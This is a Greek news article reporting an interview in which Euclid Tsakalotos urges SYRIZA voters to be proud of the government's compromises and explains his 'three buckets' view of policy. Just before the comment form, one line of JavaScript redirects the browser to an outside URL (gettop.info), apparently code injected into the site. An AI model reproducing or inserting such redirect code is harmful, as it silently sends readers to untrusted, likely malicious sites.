Τσακαλώτος: Οι ψηφοφόροι του ΣΥΡΙΖΑ να είναι περήφανοι για τους συμβιβασμούς (BINTEO)

0
14

 

Σε μια συνέντευξη στο commonality.gr, το site που απηχεί τις απόψεις της εσωκομματικής τάσης των «53» της οποίας είναι μέλος, ο Ευκλείδης Τσακαλώτος λίγο πριν το 2ο Συνέδριο του ΣΥΡΙΖΑ και μεσούσης της πρώτης αξιολόγησης, λέει ότι έχει χωρίσει την πολιτική της κυβέρνησης σε τρεις… κουβάδες και ζητά από τους ψηφοφόρους του ΣΥΡΙΖΑ να είναι υπερήφανοι για τους συμβιβασμούς.

Αναγνωρίζει την αργή αλλά θετική για την οικονομία πορεία των διαπραγματεύσεων, επισημαίνει δε πως δεν είναι αυτός ο δρόμος για να βγούμε οριστικά από την κρίση, και εστιάζει στην αναγκαιότητα ενός νέου αναπτυξιακού σχεδιασμού, που θα θέσει θεμέλια για ένα διαφορετικό οικονομικό μοντέλο.

Τους πυλώνες αυτού του σχεδιασμού, καλούμαστε να κουβεντιάσουμε, και να τους κουβεντιάσουμε θεματικά, στο 2ο Συνέδριο του ΣΥΡΙΖΑ. Όσον αφορά το ίδιο το Συνέδριο και το κόμμα του ΣΥΡΙΖΑ, ο Ευκλείδης Τσακαλώτος τονίζει τη σημασία της ύπαρξης διαφορετικών ιδεολογικών ρευμάτων στο εσωτερικό ενός αριστερού κόμματος και περιμένει από τον εσωτερικό διάλογο, αλλά κυρίως από τη νεολαία, να έρθουν οι τομές εκείνες που θα οδηγήσουν σε ένα οργανωτικό μοντέλο που θα ανταποκρίνεται στις ανάγκες του 21ου αιώνα. Εξάλλου, όπως υπογραμμίζει εξαρχής, η Αριστερά δεν έχει καταφέρει μέχρι σήμερα να βρει το ιδανικό μοντέλο για ένα αριστερό κόμμα συμμετοχικό και δημοκρατικό.

«Θέλουμε το 2018, κάποιος στη Γερμανία, την Ιταλία, τη Θεσσαλονίκη, τον Πύργο να είναι περήφανος για μια κυβέρνηση της Αριστεράς που έκανε τους συμβιβασμούς της -να εξηγήσουμε γιατί χρειαζόταν να γίνουν αυτοί οι συμβιβασμοί- αλλά συγχρόνως να είναι περήφανος γιατί κάναμε αυτό για την πρωτοβάθμια υγεία ή κάναμε αυτό για την υγεία ή κάναμε κάτι για τα δικαιώματα, για τον πολιτισμό» λέει.

«Δεν μπορούμε να γυρίσουμε στο 2008. Και να έχουμε θετικούς ρυθμούς το 2017 και το 2018, δεν θα είναι βιώσιμη η ανάπτυξη, αν δεν υπάρξει αναπτυξιακή πολιτική» προσθέτει και εξηγεί «Έχω χωρίσει την πολιτική της κυβέρνησης σε τρεις κουβάδες. Ο ένας είναι αυτά που έχουμε συμφωνήσει και πρέπει να τα κάνουμε γρήγορα. Και πρέπει να τα κάνουμε γρήγορα γιατί γρήγορα θέλουμε να βγούμε από το πρόγραμμα. Ο δεύτερος είναι αυτά που είναι υπό διαπραγμάτευση -που είναι και οι εργασιακές σχέσεις- τους επόμενους μήνες. Ο τρίτος κουβάς είναι αυτά τα πράγματα που θέλουμε να κάνουμε».

  setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here